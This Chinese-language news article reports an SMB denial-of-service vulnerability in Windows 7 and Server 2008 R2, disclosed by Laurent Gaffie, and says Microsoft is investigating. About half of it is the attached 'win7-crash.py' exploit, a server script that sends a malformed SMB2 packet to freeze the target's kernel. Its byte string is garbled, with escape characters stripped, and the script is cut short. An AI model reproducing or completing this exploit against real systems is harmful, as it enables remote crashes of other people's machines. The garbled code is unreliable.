微軟昨日證實,有報告指出Windows7和WindowsServer2008R2中存在一個漏洞,可被用來進行遠程攻擊系統,並導致系統內核崩潰,微軟目前正在就此問題進行調查。
微軟官方發言人表示,此漏洞為Windows網絡文件和打印共享協議ServerMessageBlock(SMB)中存在的拒絕式服務漏洞,不過迄今為止微軟還沒有發現利用此漏洞實施攻擊行為的案例。
安全專家LaurentGaffie昨日在博客中曝光了這一漏洞,並將其定級為中高級別漏洞,LaurentGaffie表示這個漏洞會導致SMB協議進入無限死循環,他還進行了完整代碼演示。目前還沒有任何修復該漏洞的補丁,Gaffie建議用戶在微軟發布相關補丁前關閉SMB功能和端口。
Gaffie指出,無論你的防火牆是如何設置的,黑客都有可能在局域網內或是利用IE對你的系統進行攻擊。Gaffie表示,該漏洞僅影響Windows7和WindowsServer2008R2,並不對其它系統造成影響。
附代碼演示:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 andserver2008R2(infiniteloop)
#Crash inKeAccumulateTicks()duetoNT_ASSERT()/DbgRaiseAssertionFailure()caused byan#infiniteloop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from thetarget:\this_t_ip_addrBLAH,instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = x00x00x00x9a # > length shouldbe9enot9a..
xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00
x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41
xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00
x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01
xcbx51xe0x19x62x60xcax01x80x00x1ex00x20x4cx4dx20
x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e
x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a
